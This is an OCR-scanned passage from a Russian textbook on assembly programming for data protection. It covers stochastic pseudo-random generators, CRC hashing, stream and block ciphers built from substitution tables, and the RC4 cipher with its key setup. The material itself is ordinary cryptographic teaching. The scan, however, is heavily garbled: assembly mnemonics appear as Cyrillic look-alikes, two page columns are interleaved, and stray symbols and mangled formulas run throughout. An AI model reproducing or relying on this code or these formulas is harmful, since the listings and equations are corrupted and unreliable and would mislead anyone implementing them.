Возможен вариант использования А-блока, когда содержимое массива Н (а значи 
и содержимое массива А4 4!) зафиксировано, а ключевая информация подается на вход _ 
параметра преобразования. В этой ситуации для обеспечения возможности вычислени` 
результата преобразования "на лету" (без использования таблиц) в качестве содержимое! 
массива Н выбираются последовательные состояния генератора ПСП, который допуск 
ет эффективную программную реализацию. 


2.6.2. Использование А-блоков 
для построения генераторов ПСП 


Для построения стохастического генератора ПСП ВЕЗВ в схеме [Е$К, функцион" 
рующего в поле СА (2”), предлагается вместо блоков сложения в СЕ(2”) использовать ” 
блоки (рис. 2.6.8). Ключевая информация — заполнение таблиц Н, определяющих логик 
работы Е-блоков. 
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Все теоретические и практические результаты, полученные для ГЕЗК при реше 
задач защиты информации от случайных воздействий, легко обобщаются и позвол 
столь же эффективно решать задачи защиты информации от умышленных деструк 
ных воздействий. 

Рассмотрим вариант этой схемы с одним К-блоком, которая может быть представле 
одном из двух идентичных вариантов (рис. 2.6.9, а— КЕ5Е1, или 2.6.9, 6 — КЕ$Е?) При 
ответствующем выборе таблицы стохастического преобразования выходная ИСП по с 
это нелинейная №М-последовательность, т. е. последовательность максимальной  ины, 

, 


своим статистическим свойствам превосхолящая классическую М-последовательност 
выхода [РЭК той же разрядности (рис. 2.6.10 - 2.6.12). 


Рис. 2.6.8. Общий вид стохастического генератора ПСП — КЕ (режим ОЕВ) 


КЕЗЕ1 
<= -----Ч- 


Выход 














Р 
\. 2.6.9. Варианты схемы КЕ$К с одним К-блоком (режим ОЕВ) 
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Ассемблер 











к = 
= 








еее тт таит 


аааннннннныяня 
| м См | м < ео || -[-[ 








@ генератор при М = 3: 


ратора; 
— таблица преобразования; 


8 — диаграмма переключений 


а — схема гене 


Рис. 2.6.11. Стохастически 
6 





5 
ы 
[2] 
= 
ы 
РЗ 
|5 
я 
® 
5 


й генератор при М = 2 
а — схема генератора; 
6 — возможные таблицы! преобразования и соответствующие чм 9 


Рис. 2.6.10. Стохастически 








м 





Ассемблер в задачах защиты информа‘, 


нана век оосававо с нае о ново очно ваз со ориваннавевоооонавон. 
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Рис. 2.6.12. Стохастический генератор ПСП длиной 64: 
а — схема генератора; 


б — таблица преобразования; 
в — диаграмма переключений; пунктиром показана диаграмма переключений исходного 


генератора 
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На рис. 2.6.13 показана схема двухступенчатого генератора ПСП. 

На рис. 2.6.14 приведена схема генератора ПСП с непрерывно изменяющейся табл 
ней стохастического преобразования. В: каждом такте работы такого КАЗЕ слов 
(ВУТЕнь ВУТЕ)) с выхода управляющего генератора меняет местами содержимое дв 
ячеек таблиц Н: Н(В УТЕн)«>Н(ВУТЕ). | 


ой | (*) к 


Рис. 2.6.13. Вариант схемы стохастического генератора ПСП с одним К-блоком 


ВУТЕ, ВУТЕ, | 





Рис. 2.6.14. Схема генератора ПСП с непрерывно изменяющейся таблицей стохастического 
преобразования 





Разрядность В-блока - 2 или 3, 
число регистров генератора - не более 8. === 



















Программа запрашивает размерность Н512е = 
таблицы стохастического преобразования Н =========== 
(Н512е может принимать два значения - 4 и 8, которым ===== 
— Соответствует разрядность В-блока, равная соответственно 
== заполнение таблицы Ни номера отводов обратной связи == 
= Тар1 и Тар2 (Тар1 < Тар2, 0 < Тар1 < 8, 1< Тара < 9, = 
= образующий многочлен генератора имеет вид = 
$(х) = Хх + умы 1); =========ЕеееЕнЕЕы 










_ Выводит значение периода генератора при начальном состоянии 
№290 = 1, Вед1 = Вед? =... 










ВЫ Примечание. Для исследования генераторов с периодом, 
превышающим 2559, необходима другая процедура Сопу. == 





в 
/ 
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. МОБЕЬ Е1пу / 1оор МехЕМтТар1е 
. СОПЕ ; Создание массива АЧдг 
О8б 100% оу рх, ОРРЗЕТ АЧдт&Н 
Веа1п: пр Мех 1тзЕг пу сх, Н51те 
у=ЕЗ=Е Массив ВбепПпРо =============== са11 АЗаг1Т п ‘ 
<12еваЕН = 8 ; Максимальная размерность массива Н ; Ввод отводов обратной связи Тар1 и Тар2 
ММах = 8 ; Максимальное число регистров генератора оу ап, 09н 
ВбептЕо ОВ $12еВиЁН, ММах ОУ , 4х, ОРРУЕТ Мезз3 
АЧаг&Н ОВ $1теВоЕН БОР (?}; Массив Аааг 11 71 
НТар1е ПВ $12еВаЕН БОР (?}; Массив Н са11 Тприе 
° Ведз ОВ .1, (Мах - 1) УР (0} хог ан, ав 
; Массив регистров генератора поУ Тар!, ах 
Тар1 ОИ ? ; Ячейки для хранения оу ав, 09 * 
Тар2 Ом ? ; номеров отводов , оу 4х, ОРЕЗЕТ Мез$4 
; сигналов обратной связи те 21 
На1те ОИ ? ; Размерность массива Н са]1} Тприе 
уавевенёженяхяннжяехжакнкхеяныя=н===+====== ХОЕ ай, ай 
1пббабе ОВ 1, (Мах - 1) [ОР (0) поу Тар2, ах 
; Исходное состояние у=ЕЕЕЕ Моделирование генератора ПСП ========ЕЕ>ЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ 
; генератора хог ах, ах 
Мез$1 ОВ Ар, ОБН, 'Н$512е:', ОАр, ОБВ, '$' ХехеС1оск: пе ах 
Мезз2 ОВ "ВВох:', ОА, ООВ, '$' поУ Ьх, ОРЕЗЕТ Аадт&Н 
Мез$3 ОВ 'Тар1:', ОАв, Оба, '$' поу $1, ОРРЗЕТ Вед 
Мезз4 ОВ 'Тар2:', ОАВ, ООВ, '$' поу сх, Н512е 
Мез$5 ОВ 'Рег104:', ОАВ, О0А оу 91, Тар2 
; 2559 - Мах 1!!! оу Чх, Тар1 
Вез ОВ 5 ОР (301) ; Выходной буфер са11 Ваеп ; Получили новое 
$12е0щЕВиЁ = $-Ве$ ; Размер выходного буфера ; состояние генератора 
ОВ Ап, ОБЬ, '$' ; Сравнение нового и исходного состояний генератора, если 
МехеТизЕг: ; результат положительный, то в АХ получен период генератора, 
; Ввод размера таблицы стохастического преобразования ; в противном случае переход на еще один такт работы | 
поу ар, 091 ; генератора 
.| щоу ах, ОРЕЗЕТ Мезз1 тоу 41, ОРРЗЕТ Тобкабе 
1 10 21 оу 31, ОРЕЗЕТ Ведз 
са11 при Це сх, Тара 
ы хох ап, ап гере сирзЬ 
ш ет с], а1 „_ )ре МехЕС1оск 
| (ед Н$1те, ах иттяеяяяяыняяеняяняяняянняннянаненнЕнЕЕЕЕЕЕЕЕЕЕНЕнЕННЕЕЕЕЕЕННЕЕЕЕ== 
| ; Ввод таблицы стохастического преобразования ' Вывод найденного значения периода ПСП 
|| ПоУ Ьх, ОРЕЗЕТ НТар]е поУ $1, ОЕРЗЕТ Вез 
| хог св, СА поу сх, 512е0щЕВиЕ 
р оу ап, 09п са11 Сопу ® 
| поУ ах, ОЕЁзеф Мезз2 оу ан, 09. 
Ни 218 поу 4х, ОРРУЕТМезз5 
р Мех ИтТа]е: са11 при Е 21 
| . по Бубе рёх [2%], а1 


; Завершение программы 
поу ах, 46008 


пс Ьх 































{ 


= ВСеп - такт работы стохастического генератора ПСП. 





:;==== При вызове: массив Ведз - текущее состояние генератора == 
;==== 05; ВХ - адрес массива АЗатёН, СХ = НЗ1ае, ============ 
.-=== 05; 51 - адрес массива Ведз, 21 = Тар2, ОХ = Тар1. ==== 










ЧехЕР19: РИЗВ ах 








= При возврате: массив Ведз - новое состояние генератора. поУ ав, 018 
реенкенееаанняяияеянняяяяеяНННННТ НЯНЯ о 106 21 
Вбеп РВОС ср  а1, ав 
; Сохранение содержимого используемых регистров 3е ЕО Тприе 
розвЕ рор ах 
ра5В ез ах ата а1, ОВ 


‚ Инициализация и опре еление значений отводов 
; Ц Ц ред д хспа а1, 91 









; обратной связи 1 ы 
359 а44 а], 91 
ризв 93 пр №1019 
роРр ез оОЕТприе: поу ан, 02: 
ризв Ьх сх а ' а 
поу Бх, 31 21 
дес ах ИН бан 
ааа ъх, ах т 
Це ар, ВУТЕ РТВ [6х] и 
дес 91 
поУ ‘ сх, 91 
а9а $1, 91 
пу 91, $1 
дес $1 
оу а1, ВУТЕ РТВ [91] При вызове; _ . . = 
; Формирование НОВОГО СОСТОЯНИЯ генератора 0$ - а ный а Аа преобразования, 
тер поузЬ массива АЧатёН, СХ - размерность иво Аа В НЫ адрес 
рор сх рх . р = возможные значения - 4, 8. хиН (Н512е}, == 
хсй9 21, аа . . р А ыть, если При возврате: АБ - выходной байт. 
са11 ВВох | 
пу ВУТЕ РТВ [91], аЁ 
; Восстановление регистров 
рор ах ез ааа а1, ав 
рорЁ стр а1, с1 
1 МоМоЯН51те 
хог а], с]1 


НИ 1 3 е; Ьх, 512еВаЕН 


шв ДД) аааооа 
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182 ини а... кин конниниия 183 
ор .., 
ге 
боп\ ЕМОР 
еского преобразования, == увванЕяяяяняняя==аяяння==ннн=нен==нн============ 
датан, ВХ - относительный адрес ЕО Вед п =====Е=ЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ= 


массива АЗат&Н, СХ - размер массивов АЗаг и Н {8512е). ======= 





















;==== При возврате: готовый к использованию массив Ааат&н. Результаты отладки программы: 
о еноеевеаниенекененечяетеня яч ИРИ ===== те: И 
лааттиа РВОС Е ое: 881 2е: ` 
ра$й ах 31 91 . Врох: 8 
хох а1, а! 0 ро: Врох: 
по 91, $1 2еВаЕН 1 3 0 
МехеМхАЗат: _ ОУ 41, МОВР РТВ [2х + $1 ] й 1 1 
апЯ 81, ОЕЕЫ . 3 5 2 
оу ВУТЕ РТВ [0х + 91], а1 тар: ар]: 3 
1пс а1 . 2 р . 4 
1пс $1 5 
Тар2: . 
1оор — МехьИгАЧЯг Е тара : 6 
рор 91 $1 ах рег1оа: ег! 7 
. ег104: , 
тес 00014 00063 Тар1: 
Ааахтта ЕМОР 4 
ее ЕкЕЕЕЕЕЕЕЕЕЕЕЕЕЕННННЯЯ Тара: 
7 
Рег1о4: 
у==== При вызове; АХ 00508 
= 05: $51 -адрес буфера для приема строки, == 
СХ - размер выходного буфера. ======#======59= 
При возврате: готовая к выводу строка цифр исходного числа. == 2 6.3 Ст 
заежаненаняяняя====5=555555=575777 >. охастический гене : 
7 ат < 
Сопм РОС ратор байтовой ПСП 
разВЁ На рис. 2.6.15 показана 
. О схема 8-разрядного 
разв рх про аммн. генератора ПСП с эдним Е- 
ем рх, 10 тр ая реализация приведена ниже. блоком. Его 
а98 $}, сх 
дес $1 
$4 р 
МехЕр\ У: 41 р 
хог ап, 301 
оу [31], ай 
дес 81 ” 
хог ай, ай 
стр ах, Ох 
31 Ех 
пр М№ехе р . 
Ех: хог а1, 30 ед лм» [а 
оу [$1], а1 Ри 
С. 2.6 
о рх -6.15. С - _ 
рор тохастический 8-разрядный генератор ПСП при М = 4, Фх = *+*®+1 
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ВЪох8 - процедура 8-разрядного педзёлааган 





стохастического преобразования . 





Массив Кед 
раз Ьх Массив Ааа! 
х1аё ; чтение из таблицы АЗаг 
ааа а], ап ; АБ - адрес выходного 

; байта в массиве В 
ада Ьх, Н$12е ; ВХ - относительный 
; адрес массива Н Массив Н 
х1аё ; чтение из таблицы Н 
|) Ьх 
те 
ВВох8 ЕМОР 







рис. 2.6.16. Массив Керз&Адаг&Н 








Вбеп4 №8 - стохастический 8-разрядный генератор ПСИ. 
М=А, Ф(х)=х +х +1 (рис. 2.6.15}. === 


При вызове; массив Вед - текущее состояние генератора, 


ЕБ:ОТ - адрес массива ВедзёАаагёН (рис. 2.6.16}. ======= 2.6.4. Использование В-блоков 


При возврате: массив Ведз - новое состояние генератора, 















‚Е А - водной байт. = ыЕянЕяеенннн==-= для построения САС-генераторов: 
Вбеп4№8 РВОС 
разве ; Сохранение содержимого На рис. 2.6.17 показаны в 
а ав д = я розраиемемых реристров На рис. 2.6.18 пок озможные схемы стохастических СКС-генераторов 
поу 51, 91 ; Инициализация азан пример КСКС-генератора, построенного на основе 8 
фпс 81 ; регистров генератора ПСП, рассмотренного ранее (см. рис. 2.6.15 "разрядног 
рай е5 ; для команды МОУЗВ: - рис. 2.6.15). 
рор 95 ; ЕЗ:ОТ -> Вед3, 05:51 -> Ве92 : И 
оу ах, НОВО РТВ [91] . НЕНЕЯНЕНЕЕЕЕНЕЕЯЕЕЕЕЕЕЕЕЕЕ ЕЕ ЕЕ ЕЕ 
! ; Входная информация для В-блока : тстс4№М8 - стохастический СВС-генератор. == 
Це Ьх, 51 ; 05:ВХ - адрес массива АЗат&Н === М = 4, Ф(х) = хо + Хх 
р - ‚= х+1 (рис. 2.6.18) 
са11 ВВох8 ; Вычисление байта обратной связи, НИ И == 
; А. - байт обратной связи уне= ПОНРЕНННЯНЯНЕНЕНЕНЕНЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ 
* (результат я сКохастического С Ри вызове: массив Кедз - текущее состояние генератора == 
; преобразования) - входной байт, Е5:0Т - адрес м ИИ 
с1а = (рис. 2.6.16). —' р ассива Ведз&АЯЯт&Н == = 
ОУ сх, №1 ; Число повторений команды МОУ5В 
тер ВОУ$Ь ; Обновление регистров 
; Вед3, Кед2, Вед1 
оу ВУТЕ РТВ [91], а1 
; Запись байта обратной связи в Ве90 
рор $1 Бх 95 ; Восстановление разве 
рорЕ ; регистров роз 8 | } Сохранение содержимого 
ге Х 51 ; исполь 
Вбелё№8 ЕМОР пои 1, 91 Зувинх регистров 
1пс 8} ; 01 -> ве 
; 93, $1 -> В 
и пу — ВУТЕ РТВ [51], а\ ' 89? 
Г , Д входного байта в генератор 
|| Вх поу ах, МОВР РТВ [41] 
| Эдная информация для В-блока 











ао ОО 


Ро | 





""" ера инфор |нзва 2. Программирование алгоритмов защиты информации 
разв е5 | 
рор 95 
оу Ьх, 51 ; 0$:ВХ - адрес массива АЗаг&Н 
са! 1 ВВох8 ; Вычисление байта обратной связи, 


; К. - байт обратной связи 
; (результат стохастического 


; преобразования) 
с1а 
ПоУ сх, №-1 ; Число повторений команды МОУ5В 

тер поу5Ь ; Обновление регистров 
; Вед3, Веч2, Ве91 
ПОУ ВУТЕ РТВ [91], а! 
; Запись байта обратной связи в Ке90 

рор $1 рх 95$ ; Восстановление 
рорЕ ; регистров 
гее 












;= бепгсгс4№8 - формирование 16-разрядного стохастического 
; СВС-кода области памяти (хеширование области памяти). 
М=Ад, Ф(х) = м+ж + (рис. 2.6.18}. ===еяненяя=== 




















;= При вызове: массив Ведз - исходное состояние генератора, 
05:51 - адрес входного буфера ВаЁ, ======== ====== 























;==== СХ - количество обрабатываемых байтов, 
й ;==== Е5:01 - адрес массива Ведз&АЧЯт&Н. При возврате: АХ - ВСВС-код 
| . ; {хеш-образ} содержимого буфера Ва. 
| бепгсгс4№8 РКОС 
| разНЕ 
| с19 
Мех Вусе: 10935 ; Чтение очередного байта 
й . ; из буфера ВаЕ 
| разн 81 
| са11 усгс4М8 ; Обработка байта 
|| рор 91 . 
]оор МехеВусе Входная 
| оу ах, МОВО РТВ ез: [91+2] последовательность 
й ; ВХ - содержимое байтов А 
| ; регистров Ве90, Вед 1 Ри 
рорЁ К. 2.6.17. Варианты! схемы многоканального КСКС-генератора: 
те* Я — вв09 информации в цепь обратной связи КЕб с  пользовани 
| бепгскс4М8 ЕМОР 6- чем функции ХОК; 


8804 информации в цепь обр. б 
атной связи генератора ПСП с использ 
хастического преобразования; Ратор ованием 


| в-— 
| пример реализации стохастического 8—канального СКС-генератора на основе КЕЗК; 


р р р ализац и стохастического в—канального СКС-генератора на основе { } :5К 
\риме е: Ч 
С у! ох ег 29 ( ) | 


сто 
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Рис. 2.6.18. Пример стохастического СС-генератора при М=4, Фо ЕЖ+ЕЮ 1 


2.6.5. Шифрование с использованием К-блоков 


Симметричные криптоалгоритмы (криптоалгоритмы с секретным ключом) делятся 
на три большие группы: поточные, блочные и комбинированные (рис. 2.6.19). 













Симметричные криптоалгоритмы (криптоалгоритмы с секретным ключом) 


= Комбинированные 


Гаммирование 
с обратной связью 
Со сцеплением блоков 
(режимы СВС и РВС) 
С использованием 
генераторов ПСП 
Режим СЕВ 


Режим ОЕВ 


Рис. 2.6.19. Классификация симметричных криптоалгоритмов 


Самосинхронизирующиеся 
(режим СЕВ) 


Синхронные 
(режим ОРВ) 





















Особенности поточного шифрования: 


и № чо 
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ринит и ИВНи Нов вии вн и ив ок вии иваваиаииии п иновнов неон о новые 


".. .. 
^а. Чооорни ря анна низ виа оби н оон оовонивизиивосо, 


и каждый элемент исходной информационной последовательности шифруется на своем 
элементе ключевой последовательности; 


в результат преобразования отдельных элементов зависит от их позиции в исходной 
последовательности; 


и высокое быстродействие — шифрование осуществляется практически в реальном 
масштабе времени сразу при поступлении очередного элемента входной последова- 
тельности; 

в эффективная программная реализация. 


Особенности блочного шифрования: 


= шифрованию подвергаются порции информации фиксированной длины (блоки); 


и каждый блок исходной последовательности шифруется независимо от других на одном 
и том же ключе; 


в низкое быстродействие, так как функция шифрования любого блочного криптоалго- 
ритма суть многократное повторение одной и той же раундовой операции 


Недостатки блочного шифрования: 


в одинаковым блокам открытого текста соответствуют одинаковые блоки шифротекста 
и наоборот; 


и существование проблемы последнего блока неполной длины. 


В результате на практике чаще всего используется комбинированный подход, при котором 
пифрование осуществляется либо с использованием операции сцепления блоков (режим 
ВС), либо с использованием генераторов ПСП по схемам, показанным на рис. 2.3.1, б 
екимы ОЕВ и ми и рис. 2.3.1, в (режим СРВ). При этом в качестве нелинейных функ 
нераторов см. рис. 2.3.3) используются 
о м уются функции зашифрования соответствующих 


о 
й собенности шифрования методом гаммирования (поточное или комбинированное 
ифрование в режимах ОРВ и Соишек): | 


и нал 
ичие у противника, даже не знающего ключевой информации, возможности вне- 


сения предсказуемых измен 
ении в зашифрованную информацию при х 
ф р ри ее ранении или 
жест - 
кие требования к синхронизации генераторов ПСП источника и приемника инфор 


хра 
ур нении или передаче приводит к необратимым искажениям всех последующих эле- 
ентов после расшифрования. 


в ре очень приятные особенности отсутствуют при шифровании в режиме гаммиро- 

На м ит язы {поточное или комбинированное шифрование в режиме СЕВ). 
а СО ток азаны возможные схемы синхронного поточного шифрования с ис- 
стохастического преобразования. Ниже приведен пример процеду- 





ООО 


? 
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ры шифрования области памяти с использованием 8-разрядного генератора ПСП, рас 


На рис. 2.6.21 показаны возможны 
смотренного ранее (см. рис. 2.6.15). Р те схемы самосинхронизирующегося поточного 


вания с использованием бло . 
| шифро ков прямого А и обратного К"! 
ВЕСЕ ВЕСЕ образования. р о К` стохастического пре- 








1 
| 
р 
1 
‚ 
1 
| 
, 
1 
1 
1 
1 
: 
ь-- 


















с а 
| Генератор ПСП | р 
Г ([Е5К или КЕЗВ) | 
| | 
| [ЕВ или ВЕЗВ Генератор ПСП 
: ([Е5В или КЕбК) 
б 6 
Рис. 2.6.20. Варианты схемы синхронного поточного шифрования с использованием 
К-блоков: 
а — гаммирование с использованием функции ХОК; А= В, В, (А, В), В 
6 — гаммирование с использование нелинейной функции стохастического преобразования 
Рис. 2.6.21. Варианты схемы самосинхронизи ы 
К блоков: р рующегося поточного шифрования с использованием 
* 





Е Й гаммирование с использованием функции ХОК; 
_ ! 
гаммирование с использование нелинейной 


При вызове: массив Ведз - исходное состояние генератора гаммы, 
буфер ВаЕ - буфер входных данных, 05:51 - адрес буфера ВаЁ, == в — схема блока об 
Ю-' 


функции стохастического преобразования; 
ратного стохастического преобразования. ро и 


— блок обратного стохастического преобразования 







;= СХ - количество обрабатываемых байтов, = 
; Е5:01 - адрес массива ВедзёАЧат&Н. ====== 
При возврате: буфер ВаЁ - результат шифрования. 












= ТПУВВох8 - процедура обратного 8-разрядного 














ВСгурко4М8 РВОС ‚_ СТохастического преобразования. 
М№х(Вусе: разн 81 ЕЕ ЕЕ ЕЕ нЕ неа 
са11 Вбеп4№8 ; Формирование При вызове: А - входной бай _ 
; очередного байта гаммы = 05:ВХ - адрес массива асе (рие. в преобразования, 
рор 91 . и; - При возврате: АБ - выходной байт. == 
ХоГ ВУТЕ РТК [51], а! | Е СРЕЕЕЕНЕЕЕЕНЕЕЯЕЕЕЕНЕЕЕ======= 
; Шифрование очередного Е ТВ = 256 
; байта из буфера ВиЁ | ох РВОС 
1пс 51 ь разн Ьх 
тор МехсВусе 3 х1аё ; чтение из таб Ааах 
Сурков МР ЗБ а1, ай ; А. - адрес выходного 
; байта в массиве Н 
293 Бх, Н512е ; ВХ - относительный 


; адрес массива Н 
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1 
й х1ае ; чтение из таблицы Н 
рор Ьх ) 
ге ‚\ 
ТоуВВох ЕМОР р \ 


Одной из типовых структур, использующихся для построения функции зашифром, 
ния блочного криптоалгоритма, является квадрат (рис. 2.6.22). Рассмотрим вариан: 
схемы блочного криптоалгоритма с подобной структурой на основе К-блоков. Входной 
блок разрядностью 128 бит и все промежуточные результаты его преобразования пред. 
ставляются двумерным массивом байтов размерностью 4х4, вид этого массива показан 
на рис. 2.6.22, а, где ау — элемент массива (байт), находящийся на пересечении 1-й строки 
и /-го столбца, {= 0,3, /=0,3. Функция защифрования (см. рис. 2.6.22, 6) суть много. 


кратное повторение одного и того же раунда, состоящего из трех операций: 



































Ш циклический сдвиг строк; 
№ перемешивание столбцов; 
№ стохастическое преобразование байтов блока с использованием элементов (байтов) 





раундового ключа. 


На рис. 2.6.23 показаны схемы операции стохастического преобразования байтов 
с использованием блоков К!, параметрами преобразования являются соответствующие 


элементы А„ раундового ключа, 17 = 0,7, (см. рис. 2.6.23, а); циклического сдвига байтов 


строки на 7 позиций вправо, где ;— номер строки, т. е. 0-я строка остается без изменения, 
1-я сдвигается вправо на 1 позицию, 2-я — на 2 позиции, 3-я — на 3 позиции вправо (рис. 
2.6.23, 6); и перемешивания столбцов с использованием блоков К› — К (рис. 2.6.23, 8) 
Байты строки поступают на вход схемы последовательно, при этом начальное состояний 
всех регистров - нулевое. 

Схема, показанная на рис. 2.6.23, в, эффективно программируется на 32-разрядных 
процессорах. Она может использоваться самостоятельно для хеширования информации. 
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Входной блок 






Стохастическое преобразование байтов 








Сдвиг строк 


Перемешивание столбцов 1-й раунд 





Стохастическое преобразование байтов 








Сдвиг строк 








Функция зашифрования Е 





Перемешивание столбцов 


Стохастическое преобразование байтов 


Сдвиг строк 
Перемешивание столбцов 


Стохастическое преобразование байтов 


с. 2.6.22. | 1р н ПО роения ф н и ф ования 6 очного шифра: 
Ч ци С 
у кции защи 

ук ура бло ‘а да ных; Е | 


7 процедура прямого преобразования блока данных 


2-й раунд 






№-й раунд 














= | г 
ити ыы ‚ак 2. Проераммирование алаоратмов защиты информаци | 


























бобов; 


Рис. 2.6.23. Раундовые операции: 
а — стохастическое преобразование байтов; 
6 — циклические сдвиг строк; 
в — перемешивание столбиов 


2.7. Поточный шифр #С4 


2.7.1. 


ЕС4 — поточный шифр с переменным размером ключа, разработанный Роном Рив 
стом. Алгоритм работает в режиме ОГВ, т. е. поток ключевой информации не завис 
от открытого текста. Используются два 8-разрядных счетчика О] иО2 и 8-разряд 
блок замены (5-блок) (рис. 2.7.1), таблица замен имеет размерность 8 Х 256 и являет 
перестановкой (зависящей от ключа) двоичных чисел от О до 255. |: 

Рассмотрим процедуру генерации очередного байта гаммы. Пусть 5(1) иу- содерж# в 
мое ячейки с адресом 7 таблицы замен 5-блока и очередной байт гаммы. | 


Описание криптоалгоритма 


Алгоритм ВС4 


1) Такт работы первого счетчика: 
01 = (01 + 1) тоа 28. 


2) Такт работы второго счетчика: 


02 = (02 + 5(01)) тоа?*. 
у Ячейки таблицы замен 5-блока с адресами О1 и 02 обмениваются своим содержимым: 
5(01) <> 502). 
р Вычисление суммы содержимого ячеек таблицы замен 5-блока с адресами О1 и 02: 
Т= ($(01) + $02)) тоа 2. 





5) Считывание содержимого ячейки таблицы замен 5-блока с адресом 7° 


у= 5(Т). 








с. 2.7Л. Схема генератора ПСП ЮС4 


Табли 
ца замен 5-блока медленно изменяется при использовании, при этом счетчик 


| обе элемента табли 
спечивает изменение каждого 
}} 
цы, а 02 гарант ет 
, р ирует, что элементы 


р РЕЕЫЕЕЕЕЕЕЕЕНЕЕЕЕНЕЕЕЕЕЕН- = 


-= бепКС4 - такт работы 8-разрядного генератора ПСП ВС4. = 












— При вызове: 05: $1 - адрес буфера ВС41тЕо (рис. 2.7.2). 
При возврате: АБ - выходной байт. 





_ РР 
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.== Содержимое 2-й ячейки <-> с == 
разйЁ ; Сохранение содержимого ' хог ВУТЕ РТВ [5х аа А 
разн Ьх ; используемых регистров хог а!, ВУТЕ РТВ [рх + а 
с1а ; Движение по буферу ВС4ТтЁЕо в сторону хог ВУТЕ РТВ [6х + 41], а1 
; старших адресов Нин ннннвНи 
{пс ВУТЕ РТВ [31} уавяяя"” — И (о 
; Такт работы 1-го счетчика 01 рор 91 . ы _ р пк 
1098Ъ ‚ ; к = 01 ; в таблице замен 
по _ ав, а1 ; АН - копия 01 поУ ВУТЕ РТВ [рх + 91], а! 
ет ох, 51 ; 5(01) = 5(02) 
11с Ьх ; 0$: ВХ - адрес таблицы замен 5$-блока рор а 
хак А, = 500) тек 
ааа ВУТЕ РТВ [31], а1 + реги? ЕМОР 
; Такт работы 2-го счетчика 02 стер» 
а ы АН =01, А = 02 На рис. 2.7.3 показан пример работы 4-разрядного генератора ПСП АС4. При задан- 
заполнении 4-разрядного мас 
а11 берврети ; $01) <-> 802] ном осле м ряд сива КС4т® на выходе генератора формируется 4- 
ор ах |  разрядн д ельность 
х1аё ; АЬ = 802) 452013584... 
хсп9 ‹ а|, ай ; АН = 5$(02), А = 01 
хлаЕ АЬ = $01) встр 
а99 а!, ап ; М, - адрес выходного байта 
;1=3$(01) + 8(02) 35:51 
хаб, ; Чтение выходного байта АВ = о{т) 
рор Ьх ; Восстановление 
рорЕ ; регистров 
те у 








Рис. 2.7.2. Массив АС4тЮ 


;=== б5ерНреги? - шаг перемешивания 8-разрядной таблицы замен $-блока 


ЗЕерНРеги2 РВОС 


разй 91 

разй ах 

хог ап, ав 

ет 91, ах ; ОТ - адрес 2-й ячейки в таблице замен 
рор ах 

хсра аз, а! 

Хо ав, ав ; АХ - адрес 1-й ячейки 

разн ах ; Сохраним адрес 1-й ячейки в стеке 


х|ае ; Чтение в АБ содержимого 1-й ячейки 





и = 
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. . . побоев вов нови вое вичесь 
‚пооднаскоото виа ори воре вари вироничов тии вии и нуна вн оное воно порн ООС обоя вона он овосаное СТВ аня оп попов а о обв обо оооииоав оон й недо вии чиии ооо чинов ов опорное чо ава бов оо рознь о в ни оо оно ночозоюзония, 


Гнава. 


Исходное 
заполнение 


1-й так  2-йтакт  З-йтакт  4-йтакт  б-йтакр  б-йтакт  7-йтакт 8-й такт 


5$Вох 











ВС41п1 - процедура инициализации ============ 
генератора ПСП ВС4 (инициализации массива $5). 


Рис. 2.7.3. Последовательность переключений 4-разрядного генератора ПСП С4 





;==== При вызове: 05; 5Т - адрес массива Кеу, содержащего 


2.7.2. — Алгоритм разворачивания ключа ‚==== (в байтах), Еб: БТ - адрес массива КеуМазё$ (рис.2.7.5). ===== 


При возврате: готовый к использованию массив $5. 








Алгоритм инициализации таблицы замен $-блока (рис. 2.7.4). 





ЕЕ ТЬИТЕЕХЕНИИ Трон Нет мчис тент ое и 


3812е = 256 
1) Запись в каждую ячейку таблицы замен 5-блока ее собственного адреса: ВСАТла РВОС , 
от АСЕ _; . разНЕ ; Сохранение содержимого 
№1 =0,255, 5 =1. ра$Н рх ; используемых регистров 
м № ‚. ‚. , разв 91 ; Сохранение относительного адреса 
2) Заполнение байтами ключа другой 256-байтовой таблицы: , массива Кеумазз 
К={К}, 1=0, 255. по\ Ьх, #4 
ада рх, 5512е ; Е5: ВХ - адрес массива $ 
3) Инициализация индекса /: / = 0. К ;-== Заполнение массива КеуМаз === 
еу: ризВ сх $1 
4) Перемешивание таблицы замен 5-блока: МехеИтКеумаз: 
ПД АЕЕ : . 8 . 
№1 =0,255, /=(1+5,+Ё,)тоа?2*, 5, <> 5,. ср 41, Ьх 
32 ОцЕОЕМаКеКеуМаз 
ПОУ$Ь 





]оор Мех ИтКеуМаз 
рор $1 сх 











зонпизнао вии я оао ои я пи и оно иае вино ви нони ов ово но нию ву тии в ко ооо и осноо о Фичи но попона вв нови ново они нии боев н июне ново еоньь 
, 








тар МтКеу 
О`ЕО{МакеКеуМаз: 
рор $1 сх / 
;=== Заполнение массива 5 ======== | 
МОУ сх, 5512е 
хог а], а\ 
МехЕМт5: збозЪ 
1пс а1 
]оор Мех Иг5 
;=== Перемешивание массива $8 ===== 
рор рх ; ВХ - относительный 
; адрес массива КеуМаз&5 
разв 9$ ах ; Сохранение содержимого 
; используемых регистров 
разв ез - 
рор 95 ; В5:ВХ -> КеуМаз&5 
оу сх, 5512е ; Количество тактов перемешивания 
хог ах, аа ;)=0 
хог $1, 81 ;1=0 
оу 9х, сх ; ОХ = $$12е 
;=== Такт перемешивания ========== 
Мех Регт: ааа а1, ВУТЕ РТВ [Вх + $1] 
$ 3=)+К(1) 
а94 а1, ВУТЕ РТВ [Ъх + 51 + $5512е] 
=) +5(1) 


$1, ах 
аа 91, ах ; ОТ - смещение 1-го перемещаемого 


; байта в массиве КеуМа$&5 


разВ $1 ; Сохраним 1 

ада $1, ах ; 51 - смещение 2-го перемещаемого 
; байта в массиве КеуМаз&5 

са11 З6ерНРехи3 ; 5(01)<->5 (02) 

рор $1 ; Восстановим 1 

упс $1 ЕЕ 

]оор МехеРеги ; 

рор 9х 95 ; Восстановление регистров 

рор Ьх ; Восстановление 

рорЕ ; регистров 

ге 

ВС4101 ЕМОР 


ЗЕерНрегл3 - шаг перемешивания 8-разрядной 
=== таблицы замен $-блока или 8-разрядной ========== 
;==== таблицы стохастического преобразования В-блока. ============== 
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а, 
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При вызове: таблица, содержащая все значения байта, 
$1 - адрес 1-й ячейки таблицы, 01 - адрес 2-й ячейки таблицы, 
5: ВХ - адрес таблицы. 
: 8(51) <-> 5(РТ) или Н(5Т)} <-> НТ). 













